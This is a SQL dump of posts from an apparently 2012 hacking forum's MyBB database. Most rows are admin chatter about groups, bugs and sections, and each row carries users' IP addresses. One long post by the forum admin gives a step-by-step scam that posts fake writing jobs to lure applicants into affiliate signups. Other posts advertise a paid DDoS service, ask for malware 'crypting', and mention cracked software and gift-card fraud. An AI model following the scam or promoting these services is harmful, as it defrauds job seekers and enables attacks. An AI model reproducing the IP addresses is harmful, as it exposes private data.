`disableeditedby`, `edittime2`) VALUES ('1822', '389', '1799', '49', 'RE: [Suggestion] GFX Request Section', '0', '82', 'iTzIpod', '1347413558', '[quote=\'NXK\' pid=\'1799\' dateline=\'1347375550\'] Seems like a Good Idea. I approve of this. [/quote] Alright. Still open until t3h jok3r approves/denies. Hopefully it is approved! :D', '24.212.197.164', '416597412', '1', '0', '82', '1347413591', '1', '37101e15b5ad7481f3e0fc4f93b05f07', '0', '1347413591'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1823', '317', '1759', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1347413923', '[quote=\'t3h jok3r\' pid=\'1759\' dateline=\'1347246213\'] [quote=\'p420\' pid=\'1685\' dateline=\'1347076729\'] Quick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod. [/quote] You can request a group to. You don\'t have to be a Mod, Staff or Admin to request a official group. [/quote] I can\'t seem to make NXK a Leader?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3baa4e7bee65f6e8d2f11afe4266ff3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1824', '309', '1456', '61', 'RE: Quick Announcement', '0', '82', 'iTzIpod', '1347413977', 'Thanks for the announcement! :D Stickied.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7ba05a934853064e3fddd4d57252c68c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1825', '385', '1797', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347414054', '[quote=\'HoverCatz\' pid=\'1797\' dateline=\'1347367004\'] I dont want you to leave, so please dont :( [/quote] :p Can you explain with more detail? I just want to see the positive and negative posts about this. Remember it is a discussion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8291516a328657768b614786a90e6ca3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1826', '360', '1757', '58', 'RE: What are the official groups?', '0', '82', 'iTzIpod', '1347414149', '[quote=\'spacefish36\' pid=\'1757\' dateline=\'1347237703\'] Damn only two groups? I might suggest a group to LH [/quote] You can suggest one [url=http://l33thacking.net/thread-212.html] here[/url] And also, if you need a Userbar, please tell me. I can try and design it for you. Or ask Reloadzor', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8525efe4aff842f636c52d8c5fb6c653', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1827', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1347414202', 'Note: The Coders image is broken also, you forgot to edit my group \"Unique\" in. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd25373cdf3cf82341f7bcfd5201b4bc2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1828', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '1', 't3h jok3r', '1347418078', 'If NXK approved it then it\'s a 80% yes from me and don\'t always ask me in threads, if you want to ask me something then PM me. If you want to suggest something then you should ask the whole community if they agree or not.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b659f50539292c80b75a3734251e72d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1829', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347430638', 'Can you explain how it doesnt work?', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '02de742185592f1e4c1f1740cc342a71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1830', '326', '1777', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '112', '??????Z', '1347434323', '[quote=\'Timmy\' pid=\'1777\' dateline=\'1347329034\'] [quote=\'??????Z\' pid=\'1641\' dateline=\'1346964231\'] attempted McDonald\'s and Nandos. will update if it works out :) [/quote] America has Nandos? Also what restaurants can it work with? [/quote] I\'m in England so not sure if America has nandos', '92.23.147.171', '1545049003', '1', '0', '0', '0', '1', '82dd75a0ef4618d69949eeac2ed1af9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1831', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1347435328', 'Oh. Doesnt it get more than one? I will fix that when i get back home, school atm. Im home in 7 hours from this post.', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', '66168043d3d7a034c8b9a7ec71fa2dfd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1832', '389', '1828', '49', 'RE: [Suggestion] GFX Request Section', '0', '82', 'iTzIpod', '1347451017', '[quote=\'t3h jok3r\' pid=\'1828\' dateline=\'1347418078\'] If NXK approved it then it\'s a 80% yes from me and don\'t always ask me in threads, if you want to ask me something then PM me. If you want to suggest something then you should ask the whole community if they agree or not. [/quote] So. What do you think? Accept/Deny?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9794f04317e82477bf98a411e8b804e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1833', '391', '1815', '3', 'RE: Demoted', '0', '2', 'Apathy', '1347451233', 'Hmm alright thanks for letting us know.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'af219702f2a2c37d11d3c6e15922b25a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1834', '393', '0', '55', 'someone can crypt my server?', '0', '62', 'R?????zo?', '1347453303', 'Could someone crypt my server? I will PM you the direct link. thanks in advance if you could do this <3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'af07f75cd9ec89717b67cd4221d8ce37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1835', '361', '1702', '54', 'RE: Xbox live Code (1 Month)', '0', '61', 'NXK', '1347459005', '[mod]This Thread has been Closed due to code already being Used[/mod]', '38.104.158.106', '644390506', '0', '0', '1', '1347482706', '1', '517c6499c0e1b8528ea2f8b50f1dab95', '0', '1347482706'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1836', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347464106', 'Funnily I also should be in Grade 8 but I skipped 2 classes So I go to secondary school.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5a3a89f759ee8612c5080a214382f8ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1837', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '1', 't3h jok3r', '1347465866', 'You made a very useful suggestion. I actually wanted to add this when we LH gotten more members that was when LH hardly had 10 members. Now thanks to everyone LH has 175 members atm so it\'s the right time to add such a section. Thanks for suggesting, this forum will be added soon. /closed', '72.231.24.165', '1223104677', '1', '0', '1', '1347465876', '1', '74f36c5c18a404422fefe61bf20c3129', '0', '1347465876'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1838', '268', '1189', '49', 'RE: [Suggestion] Forum News Section', '0', '1', 't3h jok3r', '1347465938', 'It\'s kinda of a useless section at the moment because we don\'t much new things and we don\'t much activity .', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '784a8e5d528e0215b46f65f66a7531a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1839', '254', '1107', '49', 'RE: Gamers Section', '0', '1', 't3h jok3r', '1347465982', 'They will be added soon, can\'t say soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19251ba707b85d3455c2fe483528f617', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1840', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347466071', 'I tried sending it to my phone but it didn\'t work.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'afda5b1d7ff7b2b79b355b8037c5fc96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1841', '368', '1807', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347466214', '[quote=\'iTzIpod\' pid=\'1807\' dateline=\'1347392358\'] Wait does it have to be in the time duration of the contest. Or can it be threads from before? [/quote] The threads have to be made after you check in.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b5c667306eee57aaf2a402104bc3072', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1842', '378', '1836', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347477833', '[quote=\'sirchamp\' pid=\'1836\' dateline=\'1347464106\'] Funnily I also should be in Grade 8 but I skipped 2 classes So I go to secondary school. [/quote] Not sure if trolling or not..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '90ba364278c317b2a580b33fa0156cfe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1843', '268', '1838', '49', 'RE: [Suggestion] Forum News Section', '0', '82', 'iTzIpod', '1347477957', 'Alright. So I will close this for now. Will open a new thread once we meet the requirements?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00dcc555eab1d7f5f8112ce1d4a411b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1844', '394', '0', '3', '[Bug] Username linking to profile', '0', '82', 'iTzIpod', '1347478573', 'I\'m pretty sure when you click on your Username, it links you to your profile. :o How come it isn\'t doing that anymore? If you don\'t know what I\'m talking about, it\'s this. [img]http://i.imgur.com/INAzP.png[/img] If I click on iTzIpod, it should lead me to my profile. Or, I swear it did that before... Did it? :/ I don\'t know..', '24.212.197.164', '416597412', '1', '0', '82', '1347481687', '1', '83d67b78d8ec81e96505a405ac0c4204', '0', '1347481687'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1845', '394', '1844', '3', 'RE: [Bug] (I think) Name linking to profile', '0', '61', 'NXK', '1347478845', 'I have this problem aswell, And Yes it did.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '16f6f834c8541e9772eec55704729e80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1846', '200', '723', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1347481426', 'Nevermind I got one. It\'s cracked. I just had to switch the atmdbl.dll or whatever it\'s called with a cracked version. Request /Close thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f238728ebd134aefda574e9bd1994c6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1847', '369', '1720', '55', 'RE: Paypal 1 dollar 50cents', '0', '82', 'iTzIpod', '1347481482', 'Do you still need it because I have the money.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1655a3394414c441ba53775edc4fd6e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1848', '212', '1827', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1347481771', '[quote=\'iTzIpod\' pid=\'1827\' dateline=\'1347414202\'] Note: The Coders image is broken also, you forgot to edit my group \"Unique\" in. =] [/quote] Thanks for reporting, it was because of the new domain. Lol I don\'t know how I missed that out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f5aa64706689843875a5c1297eaf155e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1849', '18', '49', '2', 'RE: star test', '0', '1', 't3h jok3r', '1347482688', '[mod]Hi[/mod]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a27a1a17182a5d448b1a002823048abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1850', '395', '0', '9', 'Make 150+ a Day - Easy Blackhat Method!', '0', '1', 't3h jok3r', '1347484179', 'This method is blackhat… VERY blackhat. So blackhat in fact that I felt bad about doing it – however, you definitely can make money with it, as I’m proof that it works. I made $647/three days with this before I stopped –twenty minutes of work to set this up, and I’m not joking. After the setup, it took five seconds daily… to check how much I had earned. I am going to show you an exact method I used – you can expand this for any offer. A) Pick a good offer that pays well per signup. In my case, I used Auto Insurance offer which pays $4/lead. (The offer is still online on cpalead.com) B) Setup a Gmail Account. It is better that you use one that looks realistic, fake of course – something like FirstName.LastName98@gmail.com C) Purchase a domain. For example, if you choose to promote the auto insurance offer, you might purchase autoinsuranceonline.com or insuranceauctions.com. Create an email address for it - jobs@yourrelateddomain.com and add it to your Gmail account (Setting _ Accounts). Set this new email as your main email in Gmail. Redirect the domain to your offer affiliate link. D) Go to job sites, for example see below.Post something like: Hello, We are looking for writers for our Auto insurance website. You will need to create short (20 –25 word) write ups and Small product reviews. We will pay $0.01/word to start up, then increase if it goes well. You MUST be interested in insurance to take up the job. Due to payment issues, we can only take writers that are based in the USA for now. Please send an email to YourNewGmailAcc@Gmail.com to apply if you fit the criteria. Thank You, Your (Fake) Name -------------------------------- List of job websites: ONLINE WRITING JOBS - Freelance Writing Jobs Freelancer.com - Hire Freelancers & Find Freelance Jobs Online http://www.elance.com Rent a Coder: We\'ve changed our name to vWorker! I recommend the first one as it doesn’t require anything to post, just a free account. Posts will go pending first, and then live after 1-2 days. E) Go to the Gmail account you setup. Under settings, there will be a thing called Vacation auto responder. Write something like: Hello, Thank you for your interest. At the moment, we have received lots of interested parties, so are going through the applications. Please signup at our website below and take a look around, as that will make things quicker should we hire you. Online Auto Insurance - Quotes Comparison, Find Cheap Rates, Buy Car Insurance Policy Online (for example – I believe this domain is still available). Thank you, Your (Fake) Name Nearly every single person you reply to will signup. You will get a crazy amount of emails. I got more than 700 emails and almost all of those emails came within 5 days. USA, job hungryI only replied to around 100, and had almost all of them signup, netting me $640 in revenue after three days and a short while of work to setup the above steps. If you use Online Writing Jobs, your only spend is the domain. I strongly suggest you find a different offer, or not use Auto insurance on Online Writing Jobs as I have already done so. I did not promote at any other job website though, so there is a lot open for you to target. Rewrite the email and your job ads (but make them similar to the ones above) to gain maximum success. You can try this with any kind of pay per signup offer –USA ones tend to pay well. The good thing is that you are sending targeted visitors (only people that like insurance, for example) to the signup so there is a high chance a few of them will stay on giving you a good conversion rate. Enjoy,', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '88ef59b7d43f72dcd99b27ad9e2475c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1851', '394', '1844', '3', 'RE: [Bug] Username linking to profile', '0', '1', 't3h jok3r', '1347491015', 'It did, I did a new update and it\'s not able to redirect anymore. I\'m working on it now, I\'m leaving this open till it\'s solved.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9edd6d1431fa5a6fb16ed226e7b9add2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1852', '385', '1768', '19', 'RE: Discussion', '0', '1', 't3h jok3r', '1347491120', 'You\'re a good member, there are always haters in life and if you are afraid of them then you can\'t succeed. At the moment, I\'m the target so don\'t worry.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c6d313bd3f812b91c0dec0e0a66a8542', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1853', '318', '1779', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1347493581', 'OT: I can\'t use this method to make money.. Agreed with duhuh since it\'s a 50% chance to land Heads/Tails. Also, it\'s not really by doing nothing.', '24.212.197.164', '416597412', '1', '0', '61', '1347499042', '1', '072ed8f05dc70b35f7bb49fb339edda8', '0', '1347499042'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1861', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1347499317', 'I don\'t think that this is the appropriate section to place this thread. Although that is just my opinion. I\'m going to have to let t3h jok3r or NXK decide about this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '600ae21255807eb104b9aa8b29a87583', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1854', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '82', 'iTzIpod', '1347493698', 'I use this VPN from time to time. It\'s really good too. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '987b1dae564e98483e4b8e3defd301a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1855', '95', '225', '13', 'RE: XSS Cheat Sheet', '0', '82', 'iTzIpod', '1347493741', 'Thanks for contributing to L33t Hacking. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '01a1f6bc5b990e4d8248e1ae84e5fe6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1856', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347493805', 'Cool tutorial :3 I\'m not a good liar.. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '978d89be65418c4b2807e263a03e07a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1857', '391', '1820', '3', 'RE: Demoted', '0', '20', 'JakeUS', '1347493854', '[quote=\'NXK\' pid=\'1820\' dateline=\'1347413370\'] I\'m glad that I have taken over your position. I think Ill do a good job. But At the same time I feel kinda bad :( I hope I can do my job as well as you did. Thanks for the chance. [/quote] Don\'t feel bad, you\'ll do an amazing job!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '855eee6ba3103f9936d33b4d98a593c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1862', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1347505894', 'We don\'t have a marketplace so the botnets is the right section. Also I would like a vouch copy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2306757b41f9598ff4e9006df9adb870', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1863', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347517279', 'What did you use from the combobox?', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '931f93b5a8882004f7ca8877b651f68a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1864', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1347524860', 'Thanks for accepting me :) I will gladly contribute with my unique skills, specially GFX :)', '95.69.28.98', '1598364770', '1', '0', '0', '0', '1', 'e0e5d5eb18cfddc6b529c22c2a6180eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1859', '397', '0', '42', '11th Anniversary of 9/11', '0', '82', 'iTzIpod', '1347494305', 'Late thread. I know today is 9/12/12 but it\'s still a day that changed everyone\'s lives. R.I.P. Everyone that died on that day. <3 http://en.wikipedia.org/wiki/September_11_attacks', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '29cea004d4200f7e0957b26f54b9644d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1860', '398', '0', '21', '[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '100', '??zg???g????61', '1347497923', '[align=center][img]http://i.imgur.com/Re0aB.jpg?1[/img][/align]', '65.96.215.138', '1096865674', '1', '0', '100', '1350952769', '1', '46e4d46ba3f6acbbf7b05319c911346c', '0', '1350952769'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6180', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '257', 'XxTREYZxX', '1350971078', 'how do we find out about who\'s the leader of the group :)', '122.108.206.162', '2053951138', '1', '0', '0', '0', '1', 'd1de17609e50244b74f5da27980e7129', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6181', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350975452', 'Hopefully NXK chooses one soon :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '407cc5762b6e65db73208c2625548029', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6182', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '62', 'R?????zo?', '1350975514', 'You check the threads of recruitment', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd07d48bd54b7efe55cbc65af23898bc8', '0', 